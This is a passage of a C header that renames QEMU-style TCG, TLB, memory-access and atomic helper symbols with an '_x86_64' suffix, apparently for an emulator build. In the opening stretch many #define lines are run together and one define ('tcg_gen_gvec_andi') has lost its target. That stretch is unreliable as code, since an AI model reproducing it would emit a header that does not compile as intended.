tcg_gen_atomic_or_fetch_i64_x86_64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_x86_64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_x86_64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_x86_64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_x86_64 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_x86_64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_x86_64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_x86_64 
#define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_x86_64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_x86_64 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_x86_64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_x86_64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_x86_64 #define simd_desc simd_desc_x86_64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_x86_64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_x86_64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_x86_64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_x86_64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_x86_64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_x86_64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_x86_64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_x86_64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_x86_64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_x86_64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_x86_64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_x86_64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_x86_64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_x86_64 #define tcg_gen_gvec_4 tcg_gen_gvec_4_x86_64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_x86_64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_x86_64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_x86_64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_x86_64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_x86_64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_x86_64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_x86_64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_x86_64 #define tcg_gen_gvec_not tcg_gen_gvec_not_x86_64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_x86_64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_x86_64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_x86_64 #define tcg_gen_gvec_add tcg_gen_gvec_add_x86_64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_x86_64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_x86_64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_x86_64 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_x86_64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_x86_64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_x86_64 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_x86_64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_x86_64 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_x86_64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_x86_64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_x86_64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_x86_64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_x86_64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_x86_64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_x86_64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_x86_64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_x86_64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_x86_64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_x86_64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_x86_64 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_x86_64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_x86_64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_x86_64 #define tcg_gen_gvec_and tcg_gen_gvec_and_x86_64 #define tcg_gen_gvec_or tcg_gen_gvec_or_x86_64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_x86_64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_x86_64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_x86_64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_x86_64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_x86_64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_x86_64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_x86_64 #define tcg_gen_gvec_andi 
#define tcg_gen_gvec_xors tcg_gen_gvec_xors_x86_64
#define tcg_gen_gvec_xori tcg_gen_gvec_xori_x86_64
#define tcg_gen_gvec_ors tcg_gen_gvec_ors_x86_64
#define tcg_gen_gvec_ori tcg_gen_gvec_ori_x86_64
#define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_x86_64
#define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_x86_64
#define tcg_gen_gvec_shli tcg_gen_gvec_shli_x86_64
#define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_x86_64
#define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_x86_64
#define tcg_gen_gvec_shri tcg_gen_gvec_shri_x86_64
#define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_x86_64
#define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_x86_64
#define tcg_gen_gvec_sari tcg_gen_gvec_sari_x86_64
#define tcg_gen_gvec_shls tcg_gen_gvec_shls_x86_64
#define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_x86_64
#define tcg_gen_gvec_sars tcg_gen_gvec_sars_x86_64
#define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_x86_64
#define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_x86_64
#define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_x86_64
#define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_x86_64
#define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_x86_64
#define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_x86_64
#define vec_gen_2 vec_gen_2_x86_64
#define vec_gen_3 vec_gen_3_x86_64
#define vec_gen_4 vec_gen_4_x86_64
#define tcg_gen_mov_vec tcg_gen_mov_vec_x86_64
#define tcg_const_zeros_vec tcg_const_zeros_vec_x86_64
#define tcg_const_ones_vec tcg_const_ones_vec_x86_64
#define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_x86_64
#define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_x86_64
#define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_x86_64
#define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_x86_64
#define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_x86_64
#define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_x86_64
#define tcg_gen_dupi_vec tcg_gen_dupi_vec_x86_64
#define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_x86_64
#define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_x86_64
#define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_x86_64
#define tcg_gen_ld_vec tcg_gen_ld_vec_x86_64
#define tcg_gen_st_vec tcg_gen_st_vec_x86_64
#define tcg_gen_stl_vec tcg_gen_stl_vec_x86_64
#define tcg_gen_and_vec tcg_gen_and_vec_x86_64
#define tcg_gen_or_vec tcg_gen_or_vec_x86_64
#define tcg_gen_xor_vec tcg_gen_xor_vec_x86_64
#define tcg_gen_andc_vec tcg_gen_andc_vec_x86_64
#define tcg_gen_orc_vec tcg_gen_orc_vec_x86_64
#define tcg_gen_nand_vec tcg_gen_nand_vec_x86_64
#define tcg_gen_nor_vec tcg_gen_nor_vec_x86_64
#define tcg_gen_eqv_vec tcg_gen_eqv_vec_x86_64
#define tcg_gen_not_vec tcg_gen_not_vec_x86_64
#define tcg_gen_neg_vec tcg_gen_neg_vec_x86_64
#define tcg_gen_abs_vec tcg_gen_abs_vec_x86_64
#define tcg_gen_shli_vec tcg_gen_shli_vec_x86_64
#define tcg_gen_shri_vec tcg_gen_shri_vec_x86_64
#define tcg_gen_sari_vec tcg_gen_sari_vec_x86_64
#define tcg_gen_cmp_vec tcg_gen_cmp_vec_x86_64
#define tcg_gen_add_vec tcg_gen_add_vec_x86_64
#define tcg_gen_sub_vec tcg_gen_sub_vec_x86_64
#define tcg_gen_mul_vec tcg_gen_mul_vec_x86_64
#define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_x86_64
#define tcg_gen_usadd_vec tcg_gen_usadd_vec_x86_64
#define tcg_gen_sssub_vec tcg_gen_sssub_vec_x86_64
#define tcg_gen_ussub_vec tcg_gen_ussub_vec_x86_64
#define tcg_gen_smin_vec tcg_gen_smin_vec_x86_64
#define tcg_gen_umin_vec tcg_gen_umin_vec_x86_64
#define tcg_gen_smax_vec tcg_gen_smax_vec_x86_64
#define tcg_gen_umax_vec tcg_gen_umax_vec_x86_64
#define tcg_gen_shlv_vec tcg_gen_shlv_vec_x86_64
#define tcg_gen_shrv_vec tcg_gen_shrv_vec_x86_64
#define tcg_gen_sarv_vec tcg_gen_sarv_vec_x86_64
#define tcg_gen_shls_vec tcg_gen_shls_vec_x86_64
#define tcg_gen_shrs_vec tcg_gen_shrs_vec_x86_64
#define tcg_gen_sars_vec tcg_gen_sars_vec_x86_64
#define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_x86_64
#define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_x86_64
#define tb_htable_lookup tb_htable_lookup_x86_64
#define tb_set_jmp_target tb_set_jmp_target_x86_64
#define cpu_exec cpu_exec_x86_64
#define cpu_loop_exit_noexc cpu_loop_exit_noexc_x86_64
#define cpu_reloading_memory_map cpu_reloading_memory_map_x86_64
#define cpu_loop_exit cpu_loop_exit_x86_64
#define cpu_loop_exit_restore cpu_loop_exit_restore_x86_64
#define cpu_loop_exit_atomic cpu_loop_exit_atomic_x86_64
#define tlb_init tlb_init_x86_64
#define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_x86_64
#define tlb_flush tlb_flush_x86_64
#define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_x86_64
#define tlb_flush_all_cpus tlb_flush_all_cpus_x86_64
#define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_x86_64
#define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_x86_64
#define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_x86_64
#define tlb_flush_page tlb_flush_page_x86_64
#define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_x86_64
#define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_x86_64
#define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_x86_64
#define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_x86_64
#define tlb_protect_code tlb_protect_code_x86_64
#define tlb_unprotect_code tlb_unprotect_code_x86_64
#define tlb_reset_dirty tlb_reset_dirty_x86_64
#define tlb_set_dirty tlb_set_dirty_x86_64
#define tlb_set_page_with_attrs tlb_set_page_with_attrs_x86_64
#define tlb_set_page tlb_set_page_x86_64
#define get_page_addr_code_hostp get_page_addr_code_hostp_x86_64
#define get_page_addr_code get_page_addr_code_x86_64
#define probe_access probe_access_x86_64
#define tlb_vaddr_to_host tlb_vaddr_to_host_x86_64
#define helper_ret_ldub_mmu helper_ret_ldub_mmu_x86_64
#define helper_le_lduw_mmu helper_le_lduw_mmu_x86_64
#define helper_be_lduw_mmu helper_be_lduw_mmu_x86_64
#define helper_le_ldul_mmu helper_le_ldul_mmu_x86_64
#define helper_be_ldul_mmu helper_be_ldul_mmu_x86_64
#define helper_le_ldq_mmu helper_le_ldq_mmu_x86_64
#define helper_be_ldq_mmu helper_be_ldq_mmu_x86_64
#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_x86_64
#define helper_le_ldsw_mmu helper_le_ldsw_mmu_x86_64
#define helper_be_ldsw_mmu helper_be_ldsw_mmu_x86_64
#define helper_le_ldsl_mmu helper_le_ldsl_mmu_x86_64
#define helper_be_ldsl_mmu helper_be_ldsl_mmu_x86_64
#define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_x86_64
#define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_x86_64
#define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_x86_64
#define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_x86_64
#define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_x86_64
#define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_x86_64
#define cpu_ldub_data_ra cpu_ldub_data_ra_x86_64
#define cpu_ldsb_data_ra cpu_ldsb_data_ra_x86_64
#define cpu_lduw_data_ra cpu_lduw_data_ra_x86_64
#define cpu_ldsw_data_ra cpu_ldsw_data_ra_x86_64
#define cpu_ldl_data_ra cpu_ldl_data_ra_x86_64
#define cpu_ldq_data_ra cpu_ldq_data_ra_x86_64
#define cpu_ldub_data cpu_ldub_data_x86_64
#define cpu_ldsb_data cpu_ldsb_data_x86_64
#define cpu_lduw_data cpu_lduw_data_x86_64
#define cpu_ldsw_data cpu_ldsw_data_x86_64
#define cpu_ldl_data cpu_ldl_data_x86_64
#define cpu_ldq_data cpu_ldq_data_x86_64
#define helper_ret_stb_mmu helper_ret_stb_mmu_x86_64
#define helper_le_stw_mmu helper_le_stw_mmu_x86_64
#define helper_be_stw_mmu helper_be_stw_mmu_x86_64
#define helper_le_stl_mmu helper_le_stl_mmu_x86_64
#define helper_be_stl_mmu helper_be_stl_mmu_x86_64
#define helper_le_stq_mmu helper_le_stq_mmu_x86_64
#define helper_be_stq_mmu helper_be_stq_mmu_x86_64
#define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_x86_64
#define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_x86_64
#define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_x86_64
#define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_x86_64
#define cpu_stb_data_ra cpu_stb_data_ra_x86_64
#define cpu_stw_data_ra cpu_stw_data_ra_x86_64
#define cpu_stl_data_ra cpu_stl_data_ra_x86_64
#define cpu_stq_data_ra cpu_stq_data_ra_x86_64
#define cpu_stb_data cpu_stb_data_x86_64
#define cpu_stw_data cpu_stw_data_x86_64
#define cpu_stl_data cpu_stl_data_x86_64
#define cpu_stq_data cpu_stq_data_x86_64
#define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_x86_64
#define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_x86_64
#define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_x86_64
#define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_x86_64
#define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_x86_64
#define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_x86_64
#define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_x86_64
#define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_x86_64
#define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_x86_64
#define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_x86_64
#define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_x86_64
#define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_x86_64
#define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_x86_64
#define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_x86_64
#define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_x86_64
#define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_x86_64
#define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_x86_64
#define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_x86_64
#define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_x86_64
#define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_x86_64
#define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_x86_64
#define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_x86_64
#define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_x86_64
#define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_x86_64
#define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_x86_64
#define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_x86_64
#define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_x86_64
#define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_x86_64
#define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_x86_64
#define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_x86_64
#define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_x86_64
#define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_x86_64
#define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_x86_64
#define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_x86_64
#define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_x86_64
#define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_x86_64
#define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_x86_64
#define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_x86_64
#define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_x86_64
#define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_x86_64
#define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_x86_64
#define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_x86_64
#define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_x86_64
#define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_x86_64
#define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_x86_64
#define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_x86_64
#define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_x86_64
#define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_x86_64
#define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_x86_64
#define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_x86_64
#define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_x86_64
#define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_x86_64
#define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_x86_64
#define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_x86_64
#define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_x86_64
#define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_x86_64
#define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_x86_64
#define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_x86_64
#define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_x86_64
#define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_x86_64
#define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_x86_64
#define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_x86_64
#define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_x86_64
#define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_x86_64
#define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_x86_64
#define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_x86_64
#define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_x86_64
#define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_x86_64
#define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_x86_64
#define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_x86_64
#define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_x86_64
#define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_x86_64
#define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_x86_64
#define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_x86_64
#define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_x86_64
#define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_x86_64
#define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_x86_64
#define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_x86_64
#define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_x86_64
#define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_x86_64
#define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_x86_64
#define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_x86_64
#define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_x86_64
#define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_x86_64
#define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_x86_64
#define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_x86_64
#define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_x86_64
#define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_x86_64
#define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_x86_64
#define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_x86_64
#define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_x86_64
#define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_x86_64
#define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_x86_64
#define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_x86_64
#define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_x86_64
#define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_x86_64
#define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_x86_64
#define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_x86_64
#define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_x86_64
#define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_x86_64
#define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_x86_64
#define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_x86_64
#define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_x86_64
#define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_x86_64
#define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_x86_64
#define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_x86_64
#define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_x86_64
#define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_x86_64
#define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_x86_64
#define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_x86_64
#define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_x86_64
#define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_x86_64
#define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_x86_64
#define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_x86_64
#define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_x86_64
#define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_x86_64
#define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_x86_64
#define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_x86_64
#define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_x86_64
#define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_x86_64
#define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_x86_64
#define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_x86_64
#define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_x86_64
#define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_x86_64
#define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_x86_64
#define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_x86_64
#define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_x86_64
#define helper_atomic_xchgb helper_atomic_xchgb_x86_64
#define helper_atomic_fetch_addb helper_atomic_fetch_addb_x86_64
#define helper_atomic_fetch_andb helper_atomic_fetch_andb_x86_64
#define helper_atomic_fetch_orb helper_atomic_fetch_orb_x86_64
#define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_x86_64
#define helper_atomic_add_fetchb helper_atomic_add_fetchb_x86_64
#define helper_atomic_and_fetchb helper_atomic_and_fetchb_x86_64
#define helper_atomic_or_fetchb helper_atomic_or_fetchb_x86_64
#define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_x86_64
#define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_x86_64
#define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_x86_64
#define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_x86_64
#define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_x86_64
#define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_x86_64
#define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_x86_64
#define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_x86_64
#define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_x86_64
#define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_x86_64
#define helper_atomic_xchgw_le helper_atomic_xchgw_le_x86_64
#define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_x86_64
#define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_x86_64
#define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_x86_64
#define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_x86_64
#define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_x86_64
#define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_x86_64
#define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_x86_64
#define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_x86_64
#define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_x86_64
#define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_x86_64
#define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_x86_64
